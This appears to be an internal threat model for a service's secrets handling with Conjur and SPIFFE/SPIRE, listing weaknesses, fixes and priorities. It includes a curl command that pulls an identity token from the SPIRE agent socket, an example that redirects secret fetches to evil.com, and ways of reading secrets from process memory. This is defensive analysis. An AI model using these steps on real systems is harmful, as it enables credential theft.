Threat Model

Secrets & Identity Threat Model

Honest assessment of what’s secure, what’s not, and what to fix.

The Catches

1. CATCH: Env Var Fallback = Silent Downgrade Attack

The problem: When Conjur is unreachable or doesn’t have a variable, the ConjurBackend silently falls back to os.environ. An attacker who can kill the Conjur connection (network partition, DNS hijack, firewall rule) forces the app to read from env vars — which may be stale, compromised, or attacker-controlled.

# conjur_backend.py line 104-108
env_val = os.environ.get(name)
if env_val is not None:
    logger.debug("secret_env_fallback", name=name)  # debug level — easy to miss
    return env_val

Impact: If an attacker sets env vars on the host (compromised container, malicious sidecar) AND blocks Conjur, the app uses the attacker’s values.

Fix needed: In production, the fallback should be configurable. Fail-closed mode: if Conjur is configured but unreachable, refuse to return the secret instead of falling back. The debug log level hides this — should be warning at minimum.

2. CATCH: Secrets Live in Process Memory — Unprotected

The problem: Every secret fetched from Conjur sits in a Python dict as a plain str. Python strings are immutable and cannot be zeroed out. They live in memory until garbage collected — which may be never for cached values.

# conjur_backend.py — cache is a plain dict of plain strings
self._cache: dict[str, tuple[str, float]] = {}
# "sk-ant-api03-..." sits in heap memory, readable via:
#   - /proc/PID/mem (root)
#   - gcore PID (core dump)
#   - ptrace (debugger attach)
#   - memory forensics after container kill

Impact: Anyone with root on the host (or a container escape exploit) can read all cached secrets from process memory. A core dump (crash, OOM kill) writes them to disk.

Fix needed:

Disable core dumps: ulimit -c 0 or prctl(PR_SET_DUMPABLE, 0) at process start.
The cache TTL limits the window (secrets expire from cache after 5 min), but during that window they’re in plaintext memory.
Python cannot truly zero memory (strings are immutable). For the vault encryption key, crypto.py could use mlock() via ctypes to prevent swap, but this is hard in Python.

3. CATCH: SPIRE Agent Socket = Root of Trust, But Who Guards It?

The problem: The SPIFFE Workload API socket (/tmp/spire-agent/public/api.sock) is the root of trust. Any process that can open this socket can request a JWT-SVID and authenticate to Conjur as TapPass.

# If an attacker gets shell in the same pod or on the same node:
curl --unix-socket /tmp/spire-agent/public/api.sock \
     http://localhost/v1/fetch_jwt_svid \
     -d '{"audience": ["tappass"]}'
# → Gets a valid JWT-SVID → authenticates to Conjur → reads all secrets

Impact: Container escape, compromised sidecar, or same-node lateral movement = full secret access.

Mitigation (SPIRE’s responsibility, not ours):

SPIRE Agent uses kernel attestation (pid, uid, cgroups, K8s pod identity) to verify which workload is requesting the SVID.
The socket should be mounted read-only into only the TapPass container (K8s volume mount with specific pod selector).
SPIRE registration entries should be tight: only the specific pod service account + namespace + container image hash gets an SVID.

Our responsibility: Document this clearly. TapPass trusts SPIRE — if SPIRE is misconfigured (loose attestation policies), the whole chain falls apart.

4. CATCH: Conjur Admin Account = God Mode

The problem: Whoever has the Conjur admin API key can read every secret, modify policies, and impersonate any host. This is true for any centralized secrets manager.

Impact: If the Conjur admin credential is compromised, all secrets are compromised.

Mitigation:

Conjur admin should use MFA (CyberArk PAM).
Admin API key should be rotated and stored in a break-glass safe.
Separation of duty: TapPass’s host/tappass/server identity has read only — it cannot modify policies or read secrets outside its policy scope.

5. CATCH: Resolver Auto-Detection Can Be Manipulated

The problem: The resolver checks os.environ.get("CONJUR_APPLIANCE_URL") to decide which backend to use. If an attacker can set this env var (compromised Dockerfile, CI pipeline injection, K8s configmap edit), they can redirect all secret fetches to a malicious Conjur instance.

if os.environ.get("CONJUR_APPLIANCE_URL"):
    backend = ConjurBackend()  # connects to whatever URL is in the env var

Impact: Attacker sets CONJUR_APPLIANCE_URL=https://evil.com → app sends auth tokens to evil.com → evil.com returns fake secrets → app uses attacker-controlled API keys.

Fix needed: In production, the Conjur URL should be validated against an allowlist or pinned in the deployment config (not just any env var). At minimum, the TLS certificate verification (CONJUR_SSL_CERT_PATH) should be mandatory in production — pinning the CA prevents connecting to a rogue server.

6. CATCH: The 5-Minute Rotation Gap

The problem: When a secret is rotated in Conjur (e.g., a leaked API key), TapPass continues using the cached old value for up to 5 minutes (the TTL).

Impact: A 5-minute window where a compromised key is still in use, even after rotation.

Mitigation already in place: POST /admin/secrets/invalidate forces immediate cache flush. But this requires someone (or an automated system) to call it.

Fix needed: Conjur can send webhooks on secret rotation. TapPass should auto-register a webhook listener that calls invalidate() automatically — zero human intervention.

7. CATCH: No Mutual TLS to Conjur

The problem: TapPass authenticates to Conjur via JWT (SPIFFE) over one-way TLS. The Conjur server is verified via its certificate, but Conjur doesn’t verify the TLS client certificate. The authentication is at the application layer (JWT in POST body), not at the transport layer.

With mTLS, even if an attacker intercepts the JWT-SVID, they can’t replay it because they don’t have the TLS client certificate.

Fix possible: Use the SPIFFE X509-SVID (which TapPass already has from SPIRE) as the TLS client cert when connecting to Conjur. httpx supports cert=(cert_file, key_file). This adds transport-layer authentication on top of JWT application-layer authentication.

What IS Solid

Layer	Status	Why
No secrets in code/config/env	✅	129 callsites go through protocol. Only Conjur connection coordinates in env (not secrets).
Automatic rotation pickup	✅	TTL cache + invalidation endpoint. No restart needed.
Audit trail	✅	Conjur logs every secret read with host identity, timestamp, result.
No static credential for Conjur auth	✅	SPIFFE JWT-SVID from SPIRE. Auto-rotated every 5 min. No API key in production.
SPIFFE identity reuse	✅	Same SPIRE infrastructure for agent auth AND Conjur auth. Single identity system.
Protocol is open	✅	Backend is swappable. Conjur today, Vault tomorrow. No lock-in.
TLS to Conjur	✅	httpx verifies server cert. Never `verify=False`. CA pinning via `CONJUR_SSL_CERT_PATH`.
Thread safety	✅	Single lock protects cache + auth token. All Conjur I/O serialized.

Prioritized Fix List

#	Issue	Severity	Effort	Fix
1	Env fallback in production is silent downgrade	High	Small	Add `CONJUR_FAIL_CLOSED=true` mode. Log fallbacks at `warning` not `debug`.
2	Conjur URL can be redirected via env var	High	Small	Mandatory `CONJUR_SSL_CERT_PATH` in production. Validate URL against allowlist.
3	Core dumps contain secrets in memory	Medium	Small	Disable core dumps at process start. Set `RLIMIT_CORE=0`.
4	No mTLS to Conjur	Medium	Medium	Use X509-SVID as httpx client cert for Conjur connections.
5	5-min rotation gap	Low	Medium	Conjur webhook → auto-invalidate.
6	SPIRE socket access = root of trust	Low (SPIRE’s job)	N/A	Document attestation requirements.
7	Memory secrets can’t be zeroed (Python)	Low	N/A	Language limitation. TTL cache limits window.